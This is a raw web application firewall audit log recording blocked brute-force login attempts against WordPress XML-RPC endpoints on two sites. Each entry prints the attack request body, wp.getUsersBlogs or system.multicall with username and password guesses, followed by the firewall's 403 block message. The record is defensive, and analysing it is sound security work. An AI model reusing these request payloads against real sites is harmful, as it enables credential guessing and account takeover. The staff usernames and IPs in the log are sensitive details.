(CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117049051960 2833 (- - -) Stopwatch2: 1749117049051960 2833; combined=2155, p1=229, p2=1823, p3=0, p4=0, p5=61, sr=50, sw=42, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --956f6320-Z-- --dc78ad2e-A-- [05/Jun/2025:16:51:37 +0700] aEFoqeth7G2xELALzPZUEAAAAM0 103.236.140.4 44116 103.236.140.4 8181 --dc78ad2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --dc78ad2e-C-- wp.getUsersBlogs wakasarpras welcome1 --dc78ad2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc78ad2e-E-- --dc78ad2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117097145904 5323 (- - -) Stopwatch2: 1749117097145904 5323; combined=3761, p1=485, p2=3106, p3=0, p4=0, p5=100, sr=110, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc78ad2e-Z-- --48467f3b-A-- [05/Jun/2025:16:52:32 +0700] aEFo4H-K7ToMdu-YSIJRygAAAAE 103.236.140.4 44326 103.236.140.4 8181 --48467f3b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --48467f3b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix!@#123 --48467f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48467f3b-E-- --48467f3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117152722192 4409 (- - -) Stopwatch2: 1749117152722192 4409; combined=3554, p1=368, p2=2920, p3=0, p4=0, p5=146, sr=76, sw=120, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48467f3b-Z-- --70c5b010-A-- [05/Jun/2025:16:52:37 +0700] aEFo5X-K7ToMdu-YSIJR0AAAABc 103.236.140.4 44340 103.236.140.4 8181 --70c5b010-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --70c5b010-C-- wp.getUsersBlogs wakasarpras qwertyui --70c5b010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c5b010-E-- --70c5b010-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117157845554 4485 (- - -) Stopwatch2: 1749117157845554 4485; combined=3360, p1=340, p2=2829, p3=0, p4=0, p5=109, sr=79, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c5b010-Z-- --7093cb37-A-- [05/Jun/2025:16:53:37 +0700] aEFpISrHpfaS2Cuwh8UE_gAAAEo 103.236.140.4 44510 103.236.140.4 8181 --7093cb37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7093cb37-C-- wp.getUsersBlogs wakasarpras 741852963 --7093cb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7093cb37-E-- --7093cb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117217072059 4844 (- - -) Stopwatch2: 1749117217072059 4844; combined=3410, p1=463, p2=2784, p3=0, p4=0, p5=95, sr=88, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7093cb37-Z-- --46d9f63b-A-- [05/Jun/2025:16:54:40 +0700] aEFpYOth7G2xELALzPZUfAAAANY 103.236.140.4 44692 103.236.140.4 8181 --46d9f63b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --46d9f63b-C-- wp.getUsersBlogs kasubagtu kasubagtu1991 --46d9f63b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46d9f63b-E-- --46d9f63b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117280812972 5161 (- - -) Stopwatch2: 1749117280812972 5161; combined=3719, p1=468, p2=3078, p3=0, p4=0, p5=102, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46d9f63b-Z-- --bca8c03d-A-- [05/Jun/2025:16:55:18 +0700] aEFphuth7G2xELALzPZUowAAAM4 103.236.140.4 44802 103.236.140.4 8181 --bca8c03d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bca8c03d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh67 --bca8c03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bca8c03d-E-- --bca8c03d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117318268916 4456 (- - -) Stopwatch2: 1749117318268916 4456; combined=3526, p1=382, p2=2979, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bca8c03d-Z-- --3e66964c-A-- [05/Jun/2025:16:55:36 +0700] aEFpmH-K7ToMdu-YSIJSBAAAABA 103.236.140.4 44880 103.236.140.4 8181 --3e66964c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 158.220.81.196 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 158.220.81.196 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3e66964c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin1231 --3e66964c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e66964c-E-- --3e66964c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 158.220.81.196 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117336469017 4668 (- - -) Stopwatch2: 1749117336469017 4668; combined=3639, p1=394, p2=3020, p3=0, p4=0, p5=158, sr=102, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e66964c-Z-- --92f65456-A-- [05/Jun/2025:16:55:41 +0700] aEFpneth7G2xELALzPZUzwAAANM 103.236.140.4 44898 103.236.140.4 8181 --92f65456-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --92f65456-C-- wp.getUsersBlogs kasubagtu Marketing2015 --92f65456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92f65456-E-- --92f65456-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117341149832 4924 (- - -) Stopwatch2: 1749117341149832 4924; combined=3590, p1=443, p2=2976, p3=0, p4=0, p5=101, sr=95, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92f65456-Z-- --e1fff01a-A-- [05/Jun/2025:16:56:35 +0700] aEFp03-K7ToMdu-YSIJSBwAAABI 103.236.140.4 45006 103.236.140.4 8181 --e1fff01a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e1fff01a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix102030 --e1fff01a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1fff01a-E-- --e1fff01a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117395646318 5712 (- - -) Stopwatch2: 1749117395646318 5712; combined=4115, p1=490, p2=3452, p3=0, p4=0, p5=102, sr=102, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1fff01a-Z-- --d795415d-A-- [05/Jun/2025:16:56:41 +0700] aEFp2eth7G2xELALzPZVAAAAAMs 103.236.140.4 45014 103.236.140.4 8181 --d795415d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d795415d-C-- wp.getUsersBlogs kasubagtu kasubagtu@2003 --d795415d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d795415d-E-- --d795415d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117401280804 5058 (- - -) Stopwatch2: 1749117401280804 5058; combined=3641, p1=456, p2=3009, p3=0, p4=0, p5=104, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d795415d-Z-- --22376670-A-- [05/Jun/2025:16:57:41 +0700] aEFqFeth7G2xELALzPZVMwAAANU 103.236.140.4 45134 103.236.140.4 8181 --22376670-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --22376670-C-- wp.getUsersBlogs kasubagtu abc123456 --22376670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22376670-E-- --22376670-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117461365168 5353 (- - -) Stopwatch2: 1749117461365168 5353; combined=3750, p1=469, p2=3107, p3=0, p4=0, p5=103, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22376670-Z-- --b25b3506-A-- [05/Jun/2025:16:58:14 +0700] aEFqNuth7G2xELALzPZVOwAAAME 103.236.140.4 45208 103.236.140.4 8181 --b25b3506-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b25b3506-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2015! --b25b3506-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b25b3506-E-- --b25b3506-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117494738987 4880 (- - -) Stopwatch2: 1749117494738987 4880; combined=3651, p1=406, p2=3054, p3=0, p4=0, p5=113, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b25b3506-Z-- --b50d517b-A-- [05/Jun/2025:16:58:46 +0700] aEFqVuth7G2xELALzPZVWgAAAMg 103.236.140.4 45276 103.236.140.4 8181 --b50d517b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b50d517b-C-- wp.getUsersBlogs kasubagtu loginadmin --b50d517b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b50d517b-E-- --b50d517b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117526600208 5272 (- - -) Stopwatch2: 1749117526600208 5272; combined=3710, p1=439, p2=3100, p3=0, p4=0, p5=100, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b50d517b-Z-- --19acc34a-A-- [05/Jun/2025:16:59:46 +0700] aEFqkuth7G2xELALzPZVhAAAAMo 103.236.140.4 45466 103.236.140.4 8181 --19acc34a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --19acc34a-C-- wp.getUsersBlogs kasubagtu qwe!@# --19acc34a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19acc34a-E-- --19acc34a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117586246897 5087 (- - -) Stopwatch2: 1749117586246897 5087; combined=3704, p1=462, p2=3073, p3=0, p4=0, p5=99, sr=99, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19acc34a-Z-- --b4cca96f-A-- [05/Jun/2025:17:00:47 +0700] aEFqz-th7G2xELALzPZV1AAAAM4 103.236.140.4 45652 103.236.140.4 8181 --b4cca96f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b4cca96f-C-- wp.getUsersBlogs kasubagtu login --b4cca96f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4cca96f-E-- --b4cca96f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117647335797 4305 (- - -) Stopwatch2: 1749117647335797 4305; combined=3311, p1=346, p2=2802, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4cca96f-Z-- --405df33a-A-- [05/Jun/2025:17:01:52 +0700] aEFrEOth7G2xELALzPZV7QAAANg 103.236.140.4 45726 103.236.140.4 8181 --405df33a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --405df33a-C-- wp.getUsersBlogs kasubagtu qqq --405df33a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --405df33a-E-- --405df33a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 